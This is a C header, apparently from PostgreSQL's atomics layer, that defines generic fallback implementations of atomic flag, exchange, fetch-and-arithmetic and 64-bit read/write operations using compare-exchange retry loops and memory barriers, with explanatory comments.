/*-------------------------------------------------------------------------
 *
 * generic.h
 *	  Implement higher level operations based on some lower level atomic
 *	  operations.
 *
 * Portions Copyright (c) 1996-2016, PostgreSQL Global Development Group
 * Portions Copyright (c) 1994, Regents of the University of California
 *
 * src/include/port/atomics/generic.h
 *
 *-------------------------------------------------------------------------
 */

/* intentionally no include guards, should only be included by atomics.h */
#ifndef INSIDE_ATOMICS_H
#	error "should be included via atomics.h"
#endif

/*
 * If read or write barriers are undefined, we upgrade them to full memory
 * barriers.
 */
#if !defined(pg_read_barrier_impl)
#	define pg_read_barrier_impl pg_memory_barrier_impl
#endif
#if !defined(pg_write_barrier_impl)
#	define pg_write_barrier_impl pg_memory_barrier_impl
#endif
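
/*
 * Upgrading is always safe: a full barrier orders both loads and stores,
 * subsuming either one-sided guarantee, so the substitution can only cost
 * performance, never correctness.
 */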

#ifndef PG_HAVE_SPIN_DELAY
#define PG_HAVE_SPIN_DELAY
#define pg_spin_delay_impl()	((void)0)
#endif
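
/*
 * The no-op fallback is likewise always correct: a spin-delay hint (e.g.
 * x86's PAUSE instruction) merely improves the behavior of busy-wait
 * loops and is never required for correctness.
 */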


/* provide fallback */
#if !defined(PG_HAVE_ATOMIC_FLAG_SUPPORT) && defined(PG_HAVE_ATOMIC_U32_SUPPORT)
#define PG_HAVE_ATOMIC_FLAG_SUPPORT
typedef pg_atomic_uint32 pg_atomic_flag;
#endif
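
/*
 * With this fallback, a flag is simply a uint32 holding 0 (clear) or 1
 * (set); the operations defined below give it its test-and-set semantics.
 */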

#ifndef PG_HAVE_ATOMIC_READ_U32
#define PG_HAVE_ATOMIC_READ_U32
static inline uint32
pg_atomic_read_u32_impl(volatile pg_atomic_uint32 *ptr)
{
	return *(&ptr->value);
}
#endif

#ifndef PG_HAVE_ATOMIC_WRITE_U32
#define PG_HAVE_ATOMIC_WRITE_U32
static inline void
pg_atomic_write_u32_impl(volatile pg_atomic_uint32 *ptr, uint32 val)
{
	ptr->value = val;
}
#endif

#ifndef PG_HAVE_ATOMIC_UNLOCKED_WRITE_U32
#define PG_HAVE_ATOMIC_UNLOCKED_WRITE_U32
static inline void
pg_atomic_unlocked_write_u32_impl(volatile pg_atomic_uint32 *ptr, uint32 val)
{
	ptr->value = val;
}
#endif

/*
 * provide fallback for test_and_set using atomic_exchange if available
 */
#if !defined(PG_HAVE_ATOMIC_TEST_SET_FLAG) && defined(PG_HAVE_ATOMIC_EXCHANGE_U32)

#define PG_HAVE_ATOMIC_INIT_FLAG
static inline void
pg_atomic_init_flag_impl(volatile pg_atomic_flag *ptr)
{
	pg_atomic_write_u32_impl(ptr, 0);
}

#define PG_HAVE_ATOMIC_TEST_SET_FLAG
static inline bool
pg_atomic_test_set_flag_impl(volatile pg_atomic_flag *ptr)
{
	return pg_atomic_exchange_u32_impl(ptr, 1) == 0;
}

#define PG_HAVE_ATOMIC_UNLOCKED_TEST_FLAG
static inline bool
pg_atomic_unlocked_test_flag_impl(volatile pg_atomic_flag *ptr)
{
	return pg_atomic_read_u32_impl(ptr) == 0;
}


#define PG_HAVE_ATOMIC_CLEAR_FLAG
static inline void
pg_atomic_clear_flag_impl(volatile pg_atomic_flag *ptr)
{
	/* XXX: release semantics suffice? */
	pg_memory_barrier_impl();
	pg_atomic_write_u32_impl(ptr, 0);
}

/*
 * provide fallback for test_and_set using atomic_compare_exchange if
 * available.
 */
#elif !defined(PG_HAVE_ATOMIC_TEST_SET_FLAG) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U32)

#define PG_HAVE_ATOMIC_INIT_FLAG
static inline void
pg_atomic_init_flag_impl(volatile pg_atomic_flag *ptr)
{
	pg_atomic_write_u32_impl(ptr, 0);
}

#define PG_HAVE_ATOMIC_TEST_SET_FLAG
static inline bool
pg_atomic_test_set_flag_impl(volatile pg_atomic_flag *ptr)
{
	uint32 value = 0;
	return pg_atomic_compare_exchange_u32_impl(ptr, &value, 1);
}

#define PG_HAVE_ATOMIC_UNLOCKED_TEST_FLAG
static inline bool
pg_atomic_unlocked_test_flag_impl(volatile pg_atomic_flag *ptr)
{
	return pg_atomic_read_u32_impl(ptr) == 0;
}

#define PG_HAVE_ATOMIC_CLEAR_FLAG
static inline void
pg_atomic_clear_flag_impl(volatile pg_atomic_flag *ptr)
{
	/*
	 * Use a memory barrier + plain write if we have a native memory
	 * barrier. But don't do so if memory barriers use spinlocks - that'd lead
	 * to circularity if flags are used to implement spinlocks.
	 */
#ifndef PG_HAVE_MEMORY_BARRIER_EMULATION
	/* XXX: release semantics suffice? */
	pg_memory_barrier_impl();
	pg_atomic_write_u32_impl(ptr, 0);
#else
	uint32 value = 1;
	pg_atomic_compare_exchange_u32_impl(ptr, &value, 0);
#endif
}

#elif !defined(PG_HAVE_ATOMIC_TEST_SET_FLAG)
#	error "No pg_atomic_test_and_set provided"
#endif /* !defined(PG_HAVE_ATOMIC_TEST_SET_FLAG) */
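
/*
 * Illustrative sketch only (not part of this header): together with
 * pg_spin_delay_impl(), the flag operations above suffice to build a
 * TAS spinlock over a hypothetical pg_atomic_flag "lock":
 *
 *		while (!pg_atomic_test_set_flag_impl(&lock))
 *			pg_spin_delay_impl();
 *		... critical section ...
 *		pg_atomic_clear_flag_impl(&lock);
 */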


#ifndef PG_HAVE_ATOMIC_INIT_U32
#define PG_HAVE_ATOMIC_INIT_U32
static inline void
pg_atomic_init_u32_impl(volatile pg_atomic_uint32 *ptr, uint32 val_)
{
	ptr->value = val_;
}
#endif

#if !defined(PG_HAVE_ATOMIC_EXCHANGE_U32) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U32)
#define PG_HAVE_ATOMIC_EXCHANGE_U32
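/*
 * Emulate exchange with a compare/exchange retry loop: each iteration
 * re-reads the current value and tries to install xchg_ in its place,
 * until no concurrent modification intervenes between the read and the
 * compare/exchange; the value observed before the swap is returned.
 */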
static inline uint32
pg_atomic_exchange_u32_impl(volatile pg_atomic_uint32 *ptr, uint32 xchg_)
{
	uint32 old;
	while (true)
	{
		old = pg_atomic_read_u32_impl(ptr);
		if (pg_atomic_compare_exchange_u32_impl(ptr, &old, xchg_))
			break;
	}
	return old;
}
#endif
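
/*
 * The arithmetic and bitwise fallbacks below use the same
 * read/compare-exchange retry pattern, each returning the value the
 * variable held before the update was applied.
 */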

#if !defined(PG_HAVE_ATOMIC_FETCH_ADD_U32) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U32)
#define PG_HAVE_ATOMIC_FETCH_ADD_U32
static inline uint32
pg_atomic_fetch_add_u32_impl(volatile pg_atomic_uint32 *ptr, int32 add_)
{
	uint32 old;
	while (true)
	{
		old = pg_atomic_read_u32_impl(ptr);
		if (pg_atomic_compare_exchange_u32_impl(ptr, &old, old + add_))
			break;
	}
	return old;
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_SUB_U32) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U32)
#define PG_HAVE_ATOMIC_FETCH_SUB_U32
static inline uint32
pg_atomic_fetch_sub_u32_impl(volatile pg_atomic_uint32 *ptr, int32 sub_)
{
	return pg_atomic_fetch_add_u32_impl(ptr, -sub_);
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_AND_U32) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U32)
#define PG_HAVE_ATOMIC_FETCH_AND_U32
static inline uint32
pg_atomic_fetch_and_u32_impl(volatile pg_atomic_uint32 *ptr, uint32 and_)
{
	uint32 old;
	while (true)
	{
		old = pg_atomic_read_u32_impl(ptr);
		if (pg_atomic_compare_exchange_u32_impl(ptr, &old, old & and_))
			break;
	}
	return old;
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_OR_U32) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U32)
#define PG_HAVE_ATOMIC_FETCH_OR_U32
static inline uint32
pg_atomic_fetch_or_u32_impl(volatile pg_atomic_uint32 *ptr, uint32 or_)
{
	uint32 old;
	while (true)
	{
		old = pg_atomic_read_u32_impl(ptr);
		if (pg_atomic_compare_exchange_u32_impl(ptr, &old, old | or_))
			break;
	}
	return old;
}
#endif

#if !defined(PG_HAVE_ATOMIC_ADD_FETCH_U32) && defined(PG_HAVE_ATOMIC_FETCH_ADD_U32)
#define PG_HAVE_ATOMIC_ADD_FETCH_U32
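/*
 * Derive add-then-fetch from fetch-then-add by re-applying the addend to
 * the returned pre-update value; sub_fetch below does the same with the
 * subtrahend.
 */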
static inline uint32
pg_atomic_add_fetch_u32_impl(volatile pg_atomic_uint32 *ptr, int32 add_)
{
	return pg_atomic_fetch_add_u32_impl(ptr, add_) + add_;
}
#endif

#if !defined(PG_HAVE_ATOMIC_SUB_FETCH_U32) && defined(PG_HAVE_ATOMIC_FETCH_SUB_U32)
#define PG_HAVE_ATOMIC_SUB_FETCH_U32
static inline uint32
pg_atomic_sub_fetch_u32_impl(volatile pg_atomic_uint32 *ptr, int32 sub_)
{
	return pg_atomic_fetch_sub_u32_impl(ptr, sub_) - sub_;
}
#endif

#ifdef PG_HAVE_ATOMIC_U64_SUPPORT

#if !defined(PG_HAVE_ATOMIC_EXCHANGE_U64) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U64)
#define PG_HAVE_ATOMIC_EXCHANGE_U64
static inline uint64
pg_atomic_exchange_u64_impl(volatile pg_atomic_uint64 *ptr, uint64 xchg_)
{
	uint64 old;
	while (true)
	{
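		/*
		 * This plain read may be stale, or even torn on platforms without
		 * native 64-bit loads; that is harmless, since the compare/exchange
		 * below succeeds only if "old" still matches the current value.
		 */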
		old = ptr->value;
		if (pg_atomic_compare_exchange_u64_impl(ptr, &old, xchg_))
			break;
	}
	return old;
}
#endif

#ifndef PG_HAVE_ATOMIC_WRITE_U64
#define PG_HAVE_ATOMIC_WRITE_U64
static inline void
pg_atomic_write_u64_impl(volatile pg_atomic_uint64 *ptr, uint64 val)
{
	/*
	 * 64-bit writes aren't atomic on all platforms: without native 64-bit
	 * stores, a plain write can be torn into two 32-bit stores. In the
	 * generic implementation, perform the write as an atomic exchange
	 * instead.
	 */
	pg_atomic_exchange_u64_impl(ptr, val);
}
#endif

#ifndef PG_HAVE_ATOMIC_READ_U64
#define PG_HAVE_ATOMIC_READ_U64
static inline uint64
pg_atomic_read_u64_impl(volatile pg_atomic_uint64 *ptr)
{
	uint64 old = 0;

	/*
	 * 64-bit reads aren't atomic on all platforms. In the generic
	 * implementation, perform them as a compare/exchange with 0: whether it
	 * fails or succeeds, it always returns the old value. It might store a
	 * 0, but only if the previous value was also 0, i.e. harmless.
	 */
	pg_atomic_compare_exchange_u64_impl(ptr, &old, 0);

	return old;
}
#endif

#ifndef PG_HAVE_ATOMIC_INIT_U64
#define PG_HAVE_ATOMIC_INIT_U64
static inline void
pg_atomic_init_u64_impl(volatile pg_atomic_uint64 *ptr, uint64 val_)
{
	ptr->value = val_;
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_ADD_U64) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U64)
#define PG_HAVE_ATOMIC_FETCH_ADD_U64
static inline uint64
pg_atomic_fetch_add_u64_impl(volatile pg_atomic_uint64 *ptr, int64 add_)
{
	uint64 old;
	while (true)
	{
		old = pg_atomic_read_u64_impl(ptr);
		if (pg_atomic_compare_exchange_u64_impl(ptr, &old, old + add_))
			break;
	}
	return old;
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_SUB_U64) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U64)
#define PG_HAVE_ATOMIC_FETCH_SUB_U64
static inline uint64
pg_atomic_fetch_sub_u64_impl(volatile pg_atomic_uint64 *ptr, int64 sub_)
{
	return pg_atomic_fetch_add_u64_impl(ptr, -sub_);
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_AND_U64) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U64)
#define PG_HAVE_ATOMIC_FETCH_AND_U64
static inline uint64
pg_atomic_fetch_and_u64_impl(volatile pg_atomic_uint64 *ptr, uint64 and_)
{
	uint64 old;
	while (true)
	{
		old = pg_atomic_read_u64_impl(ptr);
		if (pg_atomic_compare_exchange_u64_impl(ptr, &old, old & and_))
			break;
	}
	return old;
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_OR_U64) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U64)
#define PG_HAVE_ATOMIC_FETCH_OR_U64
static inline uint64
pg_atomic_fetch_or_u64_impl(volatile pg_atomic_uint64 *ptr, uint64 or_)
{
	uint64 old;
	while (true)
	{
		old = pg_atomic_read_u64_impl(ptr);
		if (pg_atomic_compare_exchange_u64_impl(ptr, &old, old | or_))
			break;
	}
	return old;
}
#endif

#if !defined(PG_HAVE_ATOMIC_ADD_FETCH_U64) && defined(PG_HAVE_ATOMIC_FETCH_ADD_U64)
#define PG_HAVE_ATOMIC_ADD_FETCH_U64
static inline uint64
pg_atomic_add_fetch_u64_impl(volatile pg_atomic_uint64 *ptr, int64 add_)
{
	return pg_atomic_fetch_add_u64_impl(ptr, add_) + add_;
}
#endif

#if !defined(PG_HAVE_ATOMIC_SUB_FETCH_U64) && defined(PG_HAVE_ATOMIC_FETCH_SUB_U64)
#define PG_HAVE_ATOMIC_SUB_FETCH_U64
static inline uint64
pg_atomic_sub_fetch_u64_impl(volatile pg_atomic_uint64 *ptr, int64 sub_)
{
	return pg_atomic_fetch_sub_u64_impl(ptr, sub_) - sub_;
}
#endif

#endif /* defined(PG_HAVE_ATOMIC_U64_SUPPORT) */
